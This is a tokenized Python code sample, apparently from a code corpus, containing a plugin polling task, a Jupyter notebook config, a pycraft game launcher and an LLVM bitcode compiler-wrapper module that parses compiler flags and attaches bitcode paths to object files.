<s> """<STR_LIT>""" <EOL> import os <EOL> from lib import app <EOL> from lib import plugins <EOL> from lib . modules import config as config_loader <EOL> from lib . modules . base_task import BaseTask <EOL> class PollTask ( BaseTask ) : <EOL> def __init__ ( self , config , logger , options ) : <EOL> super ( PollTask , self ) . __init__ ( config , logger , resource = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . plugin_name = options [ '<STR_LIT:name>' ] <EOL> self . plugin = getattr ( plugins , self . plugin_name ) <EOL> def run ( self ) : <EOL> try : <EOL> algo_config = config_loader . load ( os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) ) <EOL> algo_config = algo_config . get ( self . plugin_name ) [ '<STR_LIT>' ] <EOL> except AttributeError : <EOL> return None <EOL> for service , options in algo_config . iteritems ( ) : <EOL> if service and options : <EOL> params = { '<STR_LIT>' : options , '<STR_LIT>' : service } <EOL> app . task_runner . delay ( self . plugin , params ) <EOL> return True </s>
<s> c . NotebookApp . ip = '<STR_LIT:*>' <EOL> c . NotebookApp . port = <NUM_LIT> <EOL> c . NotebookApp . open_browser = False <EOL> c . MultiKernelManager . default_kernel_name = '<STR_LIT>' </s>
<s> import pyglet . app <EOL> from pycraft . window import Window <EOL> from pycraft . world import World <EOL> from pycraft . objects . player import Player <EOL> from pycraft . configuration import ConfigurationLoader <EOL> WINDOW_CAPTION = '<STR_LIT>' <EOL> def main ( ) : <EOL> config_loader = ConfigurationLoader ( ) <EOL> config_data = config_loader . load_configuration_file ( ) <EOL> config_loader . check_configuration ( ) <EOL> window = Window ( <EOL> ticks_ps = config_data [ "<STR_LIT>" ] [ "<STR_LIT>" ] , <EOL> width = config_data [ "<STR_LIT>" ] [ "<STR_LIT:width>" ] , <EOL> height = config_data [ "<STR_LIT>" ] [ "<STR_LIT>" ] , <EOL> caption = WINDOW_CAPTION , <EOL> resizable = config_data [ "<STR_LIT>" ] [ "<STR_LIT>" ] <EOL> ) <EOL> window . set_exclusive_mouse ( config_data [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> pyglet . app . run ( ) </s>
<s> from __future__ import absolute_import <EOL> from __future__ import print_function <EOL> from subprocess import * <EOL> import collections <EOL> import pprint <EOL> import logging <EOL> import errno <EOL> import os <EOL> import re <EOL> import sys <EOL> import tempfile <EOL> from . popenwrapper import Popen <EOL> fullSelfPath = os . path . realpath ( __file__ ) <EOL> prefix = os . path . dirname ( fullSelfPath ) <EOL> driverDir = prefix <EOL> llvmCompilerPathEnv = '<STR_LIT>' <EOL> elfSectionName = '<STR_LIT>' <EOL> darwinSegmentName = '<STR_LIT>' <EOL> darwinSectionName = '<STR_LIT>' <EOL> _logger = logging . getLogger ( __name__ ) <EOL> DUMPING = False <EOL> class ArgumentListFilter ( object ) : <EOL> def __init__ ( self , inputList , exactMatches = { } , patternMatches = { } ) : <EOL> defaultArgExactMatches = { <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . outputFileCallback ) , <EOL> '<STR_LIT:-c>' : ( <NUM_LIT:0> , ArgumentListFilter . compileOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . preprocessOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . assembleOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . verboseFlagCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . defaultBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . defaultBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . abortUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . 
compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . 
compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . dependencyOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . dependencyOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . dependencyBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . dependencyOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . dependencyOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . dependencyBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . dependencyBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . dependencyOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . dependencyOnlyCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . 
compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . compileBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . defaultBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . defaultBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . defaultBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . 
defaultBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , ArgumentListFilter . linkBinaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . darwinWarningLinkUnaryCallback ) , <EOL> } <EOL> defaultArgPatterns = { <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . inputFileCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . objectFileCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . linkUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . 
compileUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> r'<STR_LIT>' : ( <NUM_LIT:0> , ArgumentListFilter . compileUnaryCallback ) , <EOL> } <EOL> self . inputList = inputList <EOL> self . inputFiles = [ ] <EOL> self . objectFiles = [ ] <EOL> self . outputFilename = None <EOL> self . compileArgs = [ ] <EOL> self . linkArgs = [ ] <EOL> self . isVerbose = False <EOL> self . isDependencyOnly = False <EOL> self . isPreprocessOnly = False <EOL> self . isAssembleOnly = False <EOL> self . isAssembly = False <EOL> self . isCompileOnly = False <EOL> argExactMatches = dict ( defaultArgExactMatches ) <EOL> argExactMatches . update ( exactMatches ) <EOL> argPatterns = dict ( defaultArgPatterns ) <EOL> argPatterns . update ( patternMatches ) <EOL> self . _inputArgs = collections . deque ( inputList ) <EOL> while ( len ( self . _inputArgs ) > <NUM_LIT:0> and <EOL> not ( self . isAssembly or <EOL> self . isAssembleOnly or <EOL> self . isPreprocessOnly ) ) : <EOL> currentItem = self . _inputArgs . popleft ( ) <EOL> _logger . debug ( '<STR_LIT>' + currentItem ) <EOL> if currentItem in argExactMatches : <EOL> ( arity , handler ) = argExactMatches [ currentItem ] <EOL> flagArgs = self . _shiftArgs ( arity ) <EOL> handler ( self , currentItem , * flagArgs ) <EOL> else : <EOL> matched = False <EOL> for pattern , ( arity , handler ) in argPatterns . items ( ) : <EOL> if re . match ( pattern , currentItem ) : <EOL> flagArgs = self . _shiftArgs ( arity ) <EOL> handler ( self , currentItem , * flagArgs ) <EOL> matched = True <EOL> break <EOL> if not matched : <EOL> _logger . warning ( '<STR_LIT>' . format ( currentItem ) ) <EOL> self . compileUnaryCallback ( currentItem ) <EOL> if DUMPING : <EOL> self . dump ( ) <EOL> def _shiftArgs ( self , nargs ) : <EOL> ret = [ ] <EOL> while nargs > <NUM_LIT:0> : <EOL> a = self . _inputArgs . popleft ( ) <EOL> ret . 
append ( a ) <EOL> nargs = nargs - <NUM_LIT:1> <EOL> return ret <EOL> def abortUnaryCallback ( self , flag ) : <EOL> _logger . warning ( '<STR_LIT>' . format ( str ( self . inputList ) ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def inputFileCallback ( self , infile ) : <EOL> _logger . debug ( '<STR_LIT>' + infile ) <EOL> self . inputFiles . append ( infile ) <EOL> if re . search ( '<STR_LIT>' , infile ) : <EOL> self . isAssembly = True <EOL> def outputFileCallback ( self , flag , filename ) : <EOL> self . outputFilename = filename <EOL> def objectFileCallback ( self , objfile ) : <EOL> self . objectFiles . append ( objfile ) <EOL> def preprocessOnlyCallback ( self , flag ) : <EOL> self . isPreprocessOnly = True <EOL> def dependencyOnlyCallback ( self , flag ) : <EOL> self . isDependencyOnly = True <EOL> self . compileArgs . append ( flag ) <EOL> def assembleOnlyCallback ( self , flag ) : <EOL> self . isAssembleOnly = True <EOL> def verboseFlagCallback ( self , flag ) : <EOL> self . isVerbose = True <EOL> def compileOnlyCallback ( self , flag ) : <EOL> self . isCompileOnly = True <EOL> def linkUnaryCallback ( self , flag ) : <EOL> self . linkArgs . append ( flag ) <EOL> def compileUnaryCallback ( self , flag ) : <EOL> self . compileArgs . append ( flag ) <EOL> def darwinWarningLinkUnaryCallback ( self , flag ) : <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> _logger . warning ( '<STR_LIT>' . format ( flag ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> self . linkArgs . append ( flag ) <EOL> def defaultBinaryCallback ( self , flag , arg ) : <EOL> _logger . warning ( '<STR_LIT>' . format ( flag , arg ) ) <EOL> def dependencyBinaryCallback ( self , flag , arg ) : <EOL> self . isDependencyOnly = True <EOL> self . compileArgs . append ( flag ) <EOL> self . compileArgs . append ( arg ) <EOL> def compileBinaryCallback ( self , flag , arg ) : <EOL> self . compileArgs . append ( flag ) <EOL> self . compileArgs . 
append ( arg ) <EOL> def linkBinaryCallback ( self , flag , arg ) : <EOL> self . linkArgs . append ( flag ) <EOL> self . linkArgs . append ( arg ) <EOL> def getOutputFilename ( self ) : <EOL> if self . outputFilename is not None : <EOL> return self . outputFilename <EOL> elif self . isCompileOnly : <EOL> ( path , base ) = os . path . split ( self . inputFiles [ <NUM_LIT:0> ] ) <EOL> ( root , ext ) = os . path . splitext ( base ) <EOL> return '<STR_LIT>' . format ( root ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def getArtifactNames ( self , srcFile , hidden = False ) : <EOL> ( srcpath , srcbase ) = os . path . split ( srcFile ) <EOL> ( srcroot , srcext ) = os . path . splitext ( srcbase ) <EOL> if hidden : <EOL> objbase = '<STR_LIT>' . format ( srcroot ) <EOL> else : <EOL> objbase = '<STR_LIT>' . format ( srcroot ) <EOL> bcbase = '<STR_LIT>' . format ( srcroot ) <EOL> path = '<STR_LIT>' <EOL> if self . outputFilename is not None : <EOL> path = os . path . dirname ( self . outputFilename ) <EOL> return [ os . path . join ( path , objbase ) , os . path . join ( path , bcbase ) ] <EOL> def dump ( self ) : <EOL> _logger . debug ( '<STR_LIT>' . format ( self . compileArgs ) ) <EOL> _logger . debug ( '<STR_LIT>' . format ( self . inputFiles ) ) <EOL> _logger . debug ( '<STR_LIT>' . format ( self . linkArgs ) ) <EOL> _logger . debug ( '<STR_LIT>' . format ( self . objectFiles ) ) <EOL> _logger . debug ( '<STR_LIT>' . format ( self . outputFilename ) ) <EOL> for srcFile in self . inputFiles : <EOL> _logger . debug ( '<STR_LIT>' . format ( srcFile ) ) <EOL> ( objFile , bcFile ) = self . getArtifactNames ( srcFile ) <EOL> _logger . debug ( '<STR_LIT>' . format ( srcFile , objFile , bcFile ) ) <EOL> class ClangBitcodeArgumentListFilter ( ArgumentListFilter ) : <EOL> def __init__ ( self , arglist ) : <EOL> localCallbacks = { '<STR_LIT>' : ( <NUM_LIT:1> , ClangBitcodeArgumentListFilter . outputFileCallback ) } <EOL> super ( ClangBitcodeArgumentListFilter , self ) . 
__init__ ( arglist , exactMatches = localCallbacks ) <EOL> def outputFileCallback ( self , flag , filename ) : <EOL> self . outputFilename = filename <EOL> class FileType ( object ) : <EOL> revMap = { } <EOL> @ classmethod <EOL> def getFileType ( cls , fileName ) : <EOL> fileP = Popen ( [ '<STR_LIT:file>' , os . path . realpath ( fileName ) ] , stdout = PIPE ) <EOL> output = fileP . communicate ( ) [ <NUM_LIT:0> ] <EOL> output = output . decode ( ) <EOL> if '<STR_LIT>' in output and '<STR_LIT>' in output : <EOL> return cls . ELF_EXECUTABLE <EOL> if '<STR_LIT>' in output and '<STR_LIT>' in output : <EOL> return cls . MACH_EXECUTABLE <EOL> elif '<STR_LIT>' in output and '<STR_LIT>' in output : <EOL> return cls . ELF_SHARED <EOL> elif '<STR_LIT>' in output and '<STR_LIT>' in output : <EOL> return cls . MACH_SHARED <EOL> elif '<STR_LIT>' in output : <EOL> return cls . ARCHIVE <EOL> elif '<STR_LIT>' in output and '<STR_LIT>' in output : <EOL> return cls . ELF_OBJECT <EOL> elif '<STR_LIT>' in output and '<STR_LIT:object>' in output : <EOL> return cls . MACH_OBJECT <EOL> else : <EOL> return cls . UNKNOWN <EOL> @ classmethod <EOL> def init ( cls ) : <EOL> for ( index , name ) in enumerate ( ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) ) : <EOL> setattr ( cls , name , index ) <EOL> cls . revMap [ index ] = name <EOL> FileType . init ( ) <EOL> def attachBitcodePathToObject ( bcPath , outFileName ) : <EOL> ( root , ext ) = os . path . splitext ( outFileName ) <EOL> _logger . debug ( '<STR_LIT>' . format ( bcPath , outFileName , ext ) ) <EOL> if ext not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> _logger . warning ( '<STR_LIT>' . format ( outFileName , FileType . getFileType ( outFileName ) ) ) <EOL> return <EOL> f = tempfile . NamedTemporaryFile ( mode = '<STR_LIT>' , delete = False ) <EOL> absBcPath = os . path . 
abspath ( bcPath ) <EOL> f . write ( absBcPath . encode ( ) ) <EOL> f . write ( '<STR_LIT:\n>' . encode ( ) ) <EOL> _logger . debug ( pprint . pformat ( '<STR_LIT>' . format ( absBcPath , f . name ) ) ) <EOL> f . flush ( ) <EOL> os . fsync ( f . fileno ( ) ) <EOL> f . close ( ) <EOL> if ( sys . platform . startswith ( '<STR_LIT>' ) ) : <EOL> objcopyCmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , outFileName , '<STR_LIT>' , darwinSegmentName , darwinSectionName , f . name , '<STR_LIT>' , outFileName ] <EOL> else : <EOL> objcopyCmd = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' . format ( elfSectionName , f . name ) , outFileName ] <EOL> orc = <NUM_LIT:0> <EOL> try : <EOL> if os . path . getsize ( outFileName ) > <NUM_LIT:0> : <EOL> objProc = Popen ( objcopyCmd ) <EOL> orc = objProc . wait ( ) <EOL> except OSError : <EOL> os . remove ( f . name ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> os . remove ( f . name ) <EOL> if orc != <NUM_LIT:0> : <EOL> _logger . error ( '<STR_LIT>' . format ( orc ) ) <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> class BuilderBase ( object ) : <EOL> def __init__ ( self , cmd , isCxx , prefixPath = None ) : <EOL> self . cmd = cmd <EOL> self . isCxx = isCxx <EOL> if prefixPath : <EOL> self . prefixPath = prefixPath <EOL> if self . prefixPath [ - <NUM_LIT:1> ] != os . path . sep : <EOL> self . prefixPath = self . prefixPath + os . path . sep <EOL> if not os . path . exists ( self . prefixPath ) : <EOL> errorMsg = '<STR_LIT>' . format ( self . prefixPath ) <EOL> _logger . error ( errorMsg ) <EOL> raise Exception ( errorMsg ) <EOL> else : <EOL> self . prefixPath = '<STR_LIT>' <EOL> def getBitcodeFileName ( self , argFilter ) : <EOL> ( dirs , baseFile ) = os . path . split ( argFilter . getOutputFilename ( ) ) <EOL> bcfilename = os . path . join ( dirs , '<STR_LIT>' . 
format ( baseFile ) ) <EOL> return bcfilename <EOL> class ClangBuilder ( BuilderBase ) : <EOL> def __init__ ( self , cmd , isCxx , prefixPath = None ) : <EOL> super ( ClangBuilder , self ) . __init__ ( cmd , isCxx , prefixPath ) <EOL> def getBitcodeCompiler ( self ) : <EOL> cc = self . getCompiler ( ) <EOL> return cc + [ '<STR_LIT>' ] <EOL> def getCompiler ( self ) : <EOL> if self . isCxx : <EOL> return [ '<STR_LIT>' . format ( self . prefixPath ) ] <EOL> else : <EOL> return [ '<STR_LIT>' . format ( self . prefixPath ) ] <EOL> def getBitcodeArglistFilter ( self ) : <EOL> return ClangBitcodeArgumentListFilter ( self . cmd ) <EOL> def extraBitcodeArgs ( self , argFilter ) : <EOL> bcPath = self . getBitcodeFileName ( argFilter ) <EOL> return [ '<STR_LIT>' , bcPath ] <EOL> def attachBitcode ( self , argFilter ) : <EOL> bcname = self . getBitcodeFileName ( argFilter ) <EOL> outFile = argFilter . getOutputFilename ( ) <EOL> attachBitcodePathToObject ( bcname , outFile ) <EOL> class DragoneggBuilder ( BuilderBase ) : <EOL> def __init__ ( self , cmd , isCxx , prefixPath = None ) : <EOL> super ( DragoneggBuilder , self ) . __init__ ( cmd , isCxx , prefixPath ) <EOL> def getBitcodeCompiler ( self ) : <EOL> pth = os . getenv ( '<STR_LIT>' ) <EOL> cc = self . getCompiler ( ) <EOL> cmd = cc + [ '<STR_LIT>' , driverDir , '<STR_LIT>' . format ( pth ) , '<STR_LIT>' ] <EOL> _logger . debug ( cmd ) <EOL> return cmd <EOL> def getCompiler ( self ) : <EOL> pfx = '<STR_LIT>' <EOL> if os . getenv ( '<STR_LIT>' ) is not None : <EOL> pfx = os . getenv ( '<STR_LIT>' ) <EOL> if self . isCxx : <EOL> return [ '<STR_LIT>' . format ( self . prefixPath , pfx ) ] <EOL> else : <EOL> return [ '<STR_LIT>' . format ( self . prefixPath , pfx ) ] <EOL> def getBitcodeArglistFilter ( self ) : <EOL> return ArgumentListFilter ( self . 
cmd ) <EOL> def attachBitcode ( self , argFilter ) : <EOL> pass <EOL> def extraBitcodeArgs ( self , argFilter ) : <EOL> return [ ] <EOL> def getBuilder ( cmd , isCxx ) : <EOL> compilerEnv = '<STR_LIT>' <EOL> cstring = os . getenv ( compilerEnv ) <EOL> pathPrefix = os . getenv ( llvmCompilerPathEnv ) <EOL> _logger . info ( '<STR_LIT>' . format ( cstring ) ) <EOL> if pathPrefix : <EOL> _logger . info ( '<STR_LIT>' . format ( pathPrefix ) ) <EOL> if cstring == '<STR_LIT>' : <EOL> return ClangBuilder ( cmd , isCxx , pathPrefix ) <EOL> elif cstring == '<STR_LIT>' : <EOL> return DragoneggBuilder ( cmd , isCxx , pathPrefix ) <EOL> elif cstring == None : <EOL> errorMsg = '<STR_LIT>' + compilerEnv <EOL> _logger . critical ( errorMsg ) <EOL> raise Exception ( errorMsg ) <EOL> else : <EOL> errorMsg = compilerEnv + '<STR_LIT:=>' + str ( cstring ) + '<STR_LIT>' <EOL> _logger . critical ( errorMsg ) <EOL> raise Exception ( errorMsg ) <EOL> def buildObject ( builder ) : <EOL> objCompiler = builder . getCompiler ( ) <EOL> objCompiler . extend ( builder . cmd ) <EOL> proc = Popen ( objCompiler ) <EOL> rc = proc . wait ( ) <EOL> if rc != <NUM_LIT:0> : <EOL> sys . exit ( rc ) <EOL> def buildAndAttachBitcode ( builder ) : <EOL> af = builder . getBitcodeArglistFilter ( ) <EOL> if ( len ( af . inputFiles ) == <NUM_LIT:0> or <EOL> af . isAssembly or <EOL> af . isAssembleOnly or <EOL> ( af . isDependencyOnly and not af . isCompileOnly ) or <EOL> af . isPreprocessOnly ) : <EOL> _logger . debug ( '<STR_LIT>' ) <EOL> _logger . debug ( af . __dict__ ) <EOL> return <EOL> newObjectFiles = [ ] <EOL> hidden = not af . isCompileOnly <EOL> if len ( af . inputFiles ) == <NUM_LIT:1> and af . isCompileOnly : <EOL> srcFile = af . inputFiles [ <NUM_LIT:0> ] <EOL> ( objFile , bcFile ) = af . getArtifactNames ( srcFile , hidden ) <EOL> if af . outputFilename is not None : <EOL> objFile = af . outputFilename <EOL> bcFile = builder . 
getBitcodeFileName ( af ) <EOL> buildBitcodeFile ( builder , srcFile , bcFile ) <EOL> attachBitcodePathToObject ( bcFile , objFile ) <EOL> else : <EOL> for srcFile in af . inputFiles : <EOL> ( objFile , bcFile ) = af . getArtifactNames ( srcFile , hidden ) <EOL> if hidden : <EOL> buildObjectFile ( builder , srcFile , objFile ) <EOL> newObjectFiles . append ( objFile ) <EOL> buildBitcodeFile ( builder , srcFile , bcFile ) <EOL> attachBitcodePathToObject ( bcFile , objFile ) <EOL> if not af . isCompileOnly : <EOL> linkFiles ( builder , newObjectFiles ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> def linkFiles ( builder , objectFiles ) : <EOL> af = builder . getBitcodeArglistFilter ( ) <EOL> outputFile = af . getOutputFilename ( ) <EOL> cc = builder . getCompiler ( ) <EOL> cc . extend ( objectFiles ) <EOL> cc . extend ( af . objectFiles ) <EOL> cc . extend ( af . linkArgs ) <EOL> cc . extend ( [ '<STR_LIT>' , outputFile ] ) <EOL> proc = Popen ( cc ) <EOL> rc = proc . 